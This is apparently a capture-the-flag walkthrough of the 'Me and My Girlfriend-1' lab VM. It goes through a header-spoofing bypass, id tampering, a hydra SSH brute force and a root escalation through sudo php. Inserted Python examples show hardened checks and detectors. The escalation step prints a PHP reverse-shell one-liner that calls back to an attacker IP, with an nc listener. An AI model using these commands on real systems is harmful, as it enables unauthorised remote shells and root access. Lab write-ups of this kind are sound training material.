Hello guys, welcome. Me and My Girlfriend-1 is one of the easiest virtual machines I have ever done, so let's look into it. For this, basic knowledge of PHP, Linux and HTML is required. I'm running this VM in VMware Fusion 11 on a MacBook Pro, and my attacker machine is Kali Linux. By default this VM uses a bridged network adapter, so let's connect our Kali machine to the bridged network as well.
Done. After that, let's perform a network scan using netdiscover, which is preinstalled in Kali.
Here it is. So 192.168.43.234 is our VM. Without any delay, let's scan for open ports. For port scanning I'm going to use Nmap, which comes preinstalled on Kali; on a Mac you can also install it with Homebrew.
"nmap -A 192.168.43.234 -vv". After scanning, I came to know that it's running an Apache server (version 2.4.7) and an SSH service.
Without any delay, let's get started by firing up Firefox.
Hmm, interesting. After opening the browser it seems strange, doesn't it? It stopped me for a while to think about what that message was talking about.
After going through the source code, I got this.
It's talking about header injection. So, again without any delay, let's fire up Burp Suite to intercept the traffic and inject a header. As we can see, this site can only be accessed from localhost. Quickly fire up Burp and set the browser proxy to 127.0.0.1, port 8080. I'm using Burp Community Edition here. You can see the request header below.
All we want to do is inject a header, and we can do that with Burp Suite. Go to Options under Proxy; there we'll find Match and Replace. All we need to do is replace something with our new header. So, let's go.
I've replaced the "Origin: foo.example.org" entry. You can see it in the screenshot above.
So, select that item, edit it and add "X-Forwarded-For: localhost". After that, open the browser, refresh, and forward the request. You can observe the request we changed below:
This is the request header after adding the item, and the site now appears like this:
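The bypass works because the site decides "is this localhost?" from a header the client itself writes. The following is an added example, not code from the VM or from this post: it models that localhost-only gate as plain Python functions over a request dict, one that trusts X-Forwarded-For the way the VM does and one that only believes hops appended by a known reverse proxy. TRUSTED_PROXIES and the three sample requests are constructed assumptions, not anything the VM exposes.

```python
"""Access control that trusts X-Forwarded-For versus one that does not.

Added example, not code from the VM or this post. The two gates below are
plain functions over a request dict, so they run without a web server.
"""
from ipaddress import ip_address

# Assumption for the hardened variant: reverse proxies whose appended
# X-Forwarded-For entries may be believed. Empty means "believe nobody".
TRUSTED_PROXIES = frozenset({"10.0.0.1"})


def _is_loopback(addr: str) -> bool:
    """True for the literal 'localhost', 127.0.0.0/8 and ::1."""
    if addr == "localhost":
        return True
    try:
        return ip_address(addr).is_loopback
    except ValueError:
        return False


def _header(request: dict, name: str):
    """Case-insensitive lookup in the request's header dict."""
    wanted = name.lower()
    for key, value in request.get("headers", {}).items():
        if key.lower() == wanted:
            return value
    return None


def is_local_vulnerable(request: dict) -> bool:
    """The check the VM effectively implements: the client's own header wins.

    Anyone can send 'X-Forwarded-For: localhost', so this admits every
    client that knows the header name, which is exactly what the write-up does.
    """
    forwarded = _header(request, "X-Forwarded-For")
    client = forwarded.split(",")[0].strip() if forwarded else request["remote_addr"]
    return _is_loopback(client)


def effective_client(request: dict, trusted_proxies=TRUSTED_PROXIES) -> str:
    """Client address, believing X-Forwarded-For only for hops a trusted proxy
    appended: walk the list right to left, skip our own proxies, and the first
    address that is not one of ours is the client."""
    peer = request["remote_addr"]
    if peer not in trusted_proxies:
        return peer  # direct connection: the socket peer is the truth
    forwarded = _header(request, "X-Forwarded-For")
    if not forwarded:
        return peer
    for hop in reversed([h.strip() for h in forwarded.split(",")]):
        if hop not in trusted_proxies:
            return hop
    return peer


def is_local_hardened(request: dict, trusted_proxies=TRUSTED_PROXIES) -> bool:
    """Localhost-only gate that a spoofed header cannot satisfy."""
    return _is_loopback(effective_client(request, trusted_proxies))


# Constructed requests (not captured from the VM).
SPOOFED = {"remote_addr": "192.168.43.182",
           "headers": {"X-Forwarded-For": "localhost"}}
GENUINE = {"remote_addr": "127.0.0.1", "headers": {}}
# Through the assumed trusted proxy: the client's own forged entry comes first,
# the proxy appended the real peer address last.
VIA_PROXY = {"remote_addr": "10.0.0.1",
             "headers": {"X-Forwarded-For": "127.0.0.1, 192.168.43.182"}}

if __name__ == "__main__":
    for name, req in [("spoofed", SPOOFED), ("genuine", GENUINE), ("via proxy", VIA_PROXY)]:
        print(f"{name:10s} vulnerable={is_local_vulnerable(req)} "
              f"hardened={is_local_hardened(req)}")
```

The design point is that `remote_addr` comes from the TCP connection and cannot be typed into Burp, while every X-Forwarded-For entry except those your own proxy appended is attacker-controlled text; a gate that reads the header without knowing which proxy wrote it is not a gate.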
As you can observe, when we hover over those links they show ?page=login and ?page=register. I tried SQL injection, but these are not vulnerable to it. So I registered a name and password on the register page.
After a successful registration, I logged in as sam.
Hmm, looks interesting. Look at the URL. After trying some SQL injection, I came to the conclusion that it is not vulnerable to SQL injection, but we can tamper with the parameters. After changing id=12 to id=1, I got this:
But I can't see the password here. After looking at the source code, I got the password.
As we can observe in the HTML code above, the username value is "eweuhtandingan" and the password value is "skuyatuh", so together they are a username and password. But there is no login page for them on this site; I tried to find one but failed. So I decided to create a text file with all the usernames present on the site, and a password text file as well, as below.
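Two separate bugs are stacked here: the profile page serves whichever id the URL names (the id=12 to id=1 change), and it renders the stored plaintext password into the HTML. The following is an added example, not code from the VM or from this post, showing the lookup the way the VM behaves beside one that binds the record to the logged-in session and hands the page only displayable fields. PROFILES, its field names and the sample session are constructed stand-ins for the site's user table.

```python
"""Profile lookup driven by a client-supplied id versus one bound to the session.

Added example, not code from the VM or this post. PROFILES is constructed
data; the two ids (1 and 12) mirror the ones tampered with in the write-up.
"""
from typing import Optional

# Constructed records. The VM kept the password in plaintext and rendered it
# into the profile page, which is how the write-up recovered it; a real table
# would hold only a password hash and never render even that.
PROFILES = {
    1: {"username": "first_user", "password": "plaintext-one", "name": "First User"},
    12: {"username": "sam", "password": "plaintext-sam", "name": "Sam"},
}

# The only fields a profile page should ever be handed.
PUBLIC_FIELDS = ("username", "name")


def profile_vulnerable(params: dict, session: dict) -> Optional[dict]:
    """Serves whichever id the URL carries, password included, regardless of
    who is logged in: the behaviour abused by changing id=12 to id=1."""
    return PROFILES.get(int(params["id"]))


def profile_hardened(params: dict, session: dict) -> dict:
    """Serves only the caller's own record, and only its displayable fields.

    The id defaults to the session's user; an explicit id is accepted only
    when it matches, so the parameter cannot be used to walk other records.
    """
    try:
        requested = int(params.get("id", session["user_id"]))
    except (TypeError, ValueError):
        raise ValueError("id must be an integer") from None
    if requested != session["user_id"]:
        raise PermissionError(
            f"user {session['user_id']} may not read profile {requested}")
    record = PROFILES[requested]
    return {field: record[field] for field in PUBLIC_FIELDS}


def can_read(params: dict, session: dict) -> bool:
    """True if the hardened lookup would serve this request at all."""
    try:
        profile_hardened(params, session)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    sam = {"user_id": 12}  # constructed session for the user registered above
    print("vulnerable, id=1 as sam: ", profile_vulnerable({"id": "1"}, sam))
    print("hardened,   id=12 as sam:", profile_hardened({"id": "12"}, sam))
    print("hardened,   id=1 as sam: ", can_read({"id": "1"}, sam))
```

If a page must show other users' profiles (a public directory, say), the authorization check becomes "may this session view that id" rather than equality, but the field whitelist stays: a password, hashed or not, never belongs in a response body.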
Remember, an SSH service is running on this device. Using these credentials, maybe we can log in to the VM. To find out quickly, I used hydra to get the correct username and password.
"hydra -L user.txt -P pass.txt 192.168.43.234 ssh". Using this command we can get the username and password. After running it, I got something.
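A hydra run like this one is loud on the target: sshd writes one "Failed password" line per guess to auth.log, all from one source address within seconds, usually followed by an "Accepted password" line when a guess lands. The following is an added example, not code from the VM or from this post, that detects that pattern over sample log lines. LOG is constructed to look like Debian/Ubuntu auth.log output and is not a capture from the VM; the threshold, window and assumed year are tuning assumptions.

```python
"""Spot SSH password guessing in sshd log lines.

Added example, not code from the VM or this post. LOG is constructed to
resemble Debian/Ubuntu auth.log output; threshold and window are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: one source guessing several usernames inside a few
# seconds and then succeeding, plus one ordinary user who mistyped once.
LOG = """\
Feb  9 10:15:01 vm sshd[1201]: Failed password for invalid user eweuhtandingan from 192.168.43.182 port 40210 ssh2
Feb  9 10:15:01 vm sshd[1202]: Failed password for invalid user bob from 192.168.43.182 port 40212 ssh2
Feb  9 10:15:02 vm sshd[1203]: Failed password for alice from 192.168.43.182 port 40214 ssh2
Feb  9 10:15:02 vm sshd[1204]: Failed password for alice from 192.168.43.182 port 40216 ssh2
Feb  9 10:15:03 vm sshd[1205]: Failed password for alice from 192.168.43.182 port 40218 ssh2
Feb  9 10:15:03 vm sshd[1206]: Failed password for invalid user bob from 192.168.43.182 port 40220 ssh2
Feb  9 10:15:04 vm sshd[1207]: Accepted password for alice from 192.168.43.182 port 40222 ssh2
Feb  9 10:20:00 vm sshd[1300]: Failed password for alice from 192.168.43.50 port 51000 ssh2
Feb  9 10:20:05 vm sshd[1301]: Accepted password for alice from 192.168.43.50 port 51001 ssh2
"""

EVENT = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def _parse_ts(ts: str, year: int = 2020) -> datetime:
    """auth.log timestamps carry no year, so one is assumed (2020 here)."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def find_bruteforce(lines, threshold: int = 5, window_seconds: int = 60) -> dict:
    """Report sources whose failure count inside any window_seconds-long
    window reaches threshold, with the usernames tried and any user the
    same source subsequently logged in as."""
    failures = defaultdict(list)   # src -> [(timestamp, user)]
    accepted = defaultdict(list)
    for line in lines:
        m = EVENT.match(line)
        if not m:
            continue
        bucket = failures if m["result"] == "Failed" else accepted
        bucket[m["src"]].append((_parse_ts(m["ts"]), m["user"]))

    report = {}
    for src, events in failures.items():
        events.sort()
        peak, start = 0, 0
        for end in range(len(events)):          # sliding window over failures
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        first = events[0][0]
        report[src] = {
            "failures": len(events),
            "peak_in_window": peak,
            "users_tried": sorted({u for _, u in events}),
            "succeeded_as": sorted({u for ts, u in accepted.get(src, []) if ts >= first}),
        }
    return report


if __name__ == "__main__":
    for src, info in find_bruteforce(LOG.splitlines()).items():
        print(src, info)
```

The "succeeded_as" field is the part worth alerting on: a burst of failures followed by an accepted password from the same source is a guessed credential, not a user with a sticky key, and the account it names should be treated as compromised until the password is changed.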
So we've got a username and password, and we can log in to the device.
"ssh email@example.com" with the password "4lic3".
I'm in now. There is nothing here unless we look for hidden directories.
There is a folder named .my_secret. Going into that directory, I got these two files.
I've got my first flag, and we got some notes too.
And now our job is to get root access. For that, we need to find the files that Alice can run as root without a password. After some searching I came up with this: "sudo -l" gave this wonderful information.
Alice can run php with root privileges without the root password. So, if we want root privileges, we need some PHP here. Let's start a listener with the following command:
"nc -lvnp 1234". I'm using port 1234; you can pick a different one if you like.
After our listener is started, let's execute this command to get the reverse shell:
"sudo /usr/bin/php -r '$sock=fsockopen("192.168.43.182",1234);exec("/bin/sh -i <&3 >&3 2>&3");'"
After that, cd /root; cat flag2.txt, and that's it.
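The root flag falls out of a single sudoers line: a NOPASSWD rule on /usr/bin/php is a NOPASSWD rule on a root shell, because an interpreter runs whatever code it is handed. The following is an added example, not code from the VM or from this post, that audits "sudo -l" output for exactly that class of rule. SAMPLE is a constructed listing shaped like what sudo -l prints; only the /usr/bin/php line reflects what the write-up found for alice, the other rules are invented filler, and CODE_RUNNERS is an assumed starting list rather than an exhaustive one.

```python
"""Audit sudo -l output for NOPASSWD rules on programs that run arbitrary code.

Added example, not code from the VM or this post. SAMPLE is constructed;
CODE_RUNNERS is an assumed, non-exhaustive list of interpreters and shells.
"""
import re

# Interpreters and shells: once run as root they execute caller-controlled
# code, so a passwordless rule on any of them is a passwordless root shell.
CODE_RUNNERS = {
    "php", "python", "python2", "python3", "perl", "ruby", "node",
    "sh", "bash", "dash", "zsh",
}

# Matches "(runas) TAG: TAG: command, command" as printed by sudo -l.
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+?)\s*$"
)

SAMPLE = """\
Matching Defaults entries for alice on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/php
    (root) /usr/bin/apt-get
    (www-data) NOPASSWD: /usr/bin/tail /var/log/apache2/access.log
"""


def audit_sudo_l(listing: str) -> list:
    """One finding per NOPASSWD command that is ALL or a known code runner."""
    findings = []
    for line in listing.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # Defaults lines and headers do not start with "(runas)"
        tags = set(m["tags"].replace(":", " ").split())
        if "NOPASSWD" not in tags:
            continue
        for cmd in m["cmd"].split(","):
            cmd = cmd.strip()
            binary = "ALL" if cmd == "ALL" else cmd.split()[0].rsplit("/", 1)[-1]
            if binary == "ALL" or binary in CODE_RUNNERS:
                findings.append({
                    "runas": m["runas"].strip(),
                    "command": cmd,
                    "reason": "any command" if binary == "ALL"
                              else f"{binary} executes arbitrary code",
                })
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE):
        print(f"NOPASSWD as {finding['runas']}: {finding['command']} ({finding['reason']})")
```

A flagged rule should either require the password again or be narrowed to a fixed, root-owned, non-writable script that does one job; granting the interpreter itself, with or without a password prompt, hands over everything it can run.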
We've successfully hacked into our VM.
Stay tuned for more hacking stories.
Follow me on GitHub: https://github.com/LetMeHackYou
Ok guys, see you in our next article.